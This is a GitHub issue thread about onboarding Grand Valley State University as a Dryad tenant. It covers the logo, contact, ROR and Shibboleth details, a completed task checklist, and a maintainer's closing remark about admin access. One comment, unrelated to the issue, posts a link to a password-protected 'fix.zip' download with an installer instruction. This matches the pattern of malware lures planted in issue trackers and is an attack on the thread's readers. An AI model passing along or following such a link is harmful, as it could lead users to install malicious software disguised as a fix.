### ISSUE TITLE
Add Tenant: Grand Valley State University

### ISSUE THREAD

**Issue by sarahklippincott** [datadryad/dryad-product-roadmap#3607]
**Tenant name:** Grand Valley State University

**Logo location:** https://www.gvsu.edu/cms4/asset/94807988-C47A-2A7B-05628C365AC3C2FA/all-grandvalleylogos4[1656613531].jpg

**Contacts to receive submission notices:** Eric Bellmore, bellmore@gvsu.edu, 0000-0003-4477-9952

**RORs that are considered part of the tenant (including medical centers, alternate campuses, etc.)** https://ror.org/001m1hv61

**Shibboleth info, if not in [InCommon](https://incommon.org/community-organizations/):** https://incommon.org/community-organization/?id=0015000000mvGYgAAM

**Membership model:** Membership fee only

Tasks:
- [x] add config to `config/tenants`
- [x] add logo to `app/assets/images/tenants`
- [x] deploy and test on stage (institution should log in to verify working as expected)
- [x] update `tenant_id` for users in the database who have emails with the institutional domain name

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahamelers** [comment]
This is done. Just a note, I'm not seeing anyone listed to get admin dashboard access (Eric Bellmore doesn't seem to have a Dryad account yet). You should be able to give any users admin access that request it in future
